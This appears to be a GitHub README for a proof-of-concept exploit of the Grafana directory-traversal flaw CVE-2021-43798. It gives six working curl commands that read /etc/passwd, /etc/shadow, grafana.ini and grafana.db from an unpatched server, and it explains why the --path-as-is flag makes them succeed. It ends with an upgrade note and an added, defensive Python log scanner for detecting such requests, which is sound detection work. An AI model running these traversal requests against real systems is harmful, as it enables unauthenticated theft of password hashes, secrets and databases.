MalekAlthubiany/CVE-2021-43798

Grafana CVE-2021-43798 Exploit

Overview

This repository demonstrates the exploitation of CVE-2021-43798, a directory traversal vulnerability in Grafana. This vulnerability allows attackers to read arbitrary files on the server.

CVE Details

  • CVE: CVE-2021-43798
  • Description: Directory traversal vulnerability in Grafana versions prior to 8.3.1.
  • Impact: Allows unauthenticated attackers to read arbitrary files on the server.

Prerequisites

  • A vulnerable version of Grafana running (before 8.3.1)
  • Access to the target Grafana instance

Exploitation

Using curl

To exploit the vulnerability manually, you can use one of the following curl commands to attempt to read sensitive files:

curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"

Why --path-as-is?

In the context of exploiting the Grafana CVE-2021-43798 directory traversal vulnerability, the --path-as-is option is essential because it allows the specially crafted traversal sequences (../../../../../) to be sent directly to the server without modification. This can lead to accessing sensitive files on the server that are outside the intended directory.

Without --path-as-is, curl normalizes the URL path on the client side before sending the request, collapsing the ../ sequences into something like /public/plugins/Users/install.txt, which would not exploit the vulnerability. With --path-as-is, the exact traversal sequence is preserved and reaches the server as written, allowing the exploit to succeed.

Documentation Reference

You can find more details about the --path-as-is option in the curl documentation. By understanding and utilizing --path-as-is, security professionals and researchers can effectively demonstrate and test for directory traversal vulnerabilities in web applications.

Mitigation

To mitigate this vulnerability, upgrade Grafana to version 8.3.1 or later.
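
Upgrading does not show whether the instance was probed beforehand. The following is an added example, not part of this repository: a Python check that scans access-log lines for requests under /public/plugins/ containing a ".." path segment, raw or percent-encoded. It assumes a reverse proxy in front of Grafana logs the raw request line in combined-log format; the sample lines, function names and field names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (assumed combined-log format, raw request line logged).
SAMPLE_LOG = """\
203.0.113.7 - - [08/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/../../../../etc/passwd HTTP/1.1" 200 1532
203.0.113.7 - - [08/Dec/2021:10:01:05 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 4821
198.51.100.4 - - [08/Dec/2021:10:02:11 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 9120
198.51.100.4 - - [08/Dec/2021:10:02:12 +0000] "GET /public/plugins/alertlist/img/icon..svg HTTP/1.1" 200 300
203.0.113.9 - - [08/Dec/2021:10:03:00 +0000] "GET /public/plugins/graph/..%2f..%2f..%2fetc/hostname HTTP/1.1" 404 19
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
PLUGIN_PREFIX = "/public/plugins/"


def is_plugin_traversal(raw_target):
    """True if the request target is under /public/plugins/ and has a '..' segment."""
    path = raw_target.split("?", 1)[0]
    for _ in range(2):  # decode twice so %252e%252e is caught as well as %2e%2e
        path = unquote(path)
    path = path.replace("\\", "/")
    if not path.startswith(PLUGIN_PREFIX):
        return False
    # Compare whole segments so a name such as "icon..svg" is not flagged.
    return ".." in path[len(PLUGIN_PREFIX):].split("/")


def find_traversal_attempts(log_text):
    """Return one dict per log line that requested a traversal path."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m is None:
            continue
        client, _method, target, status = m.groups()
        if is_plugin_traversal(target):
            # Heuristic: a 200 means the server returned a body for that path.
            hits.append({"client": client, "target": target,
                         "status": int(status), "served": status == "200"})
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit)
```

Hits with "served" set to True are the ones to triage first; any file readable by the Grafana process at that path should be treated as disclosed.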
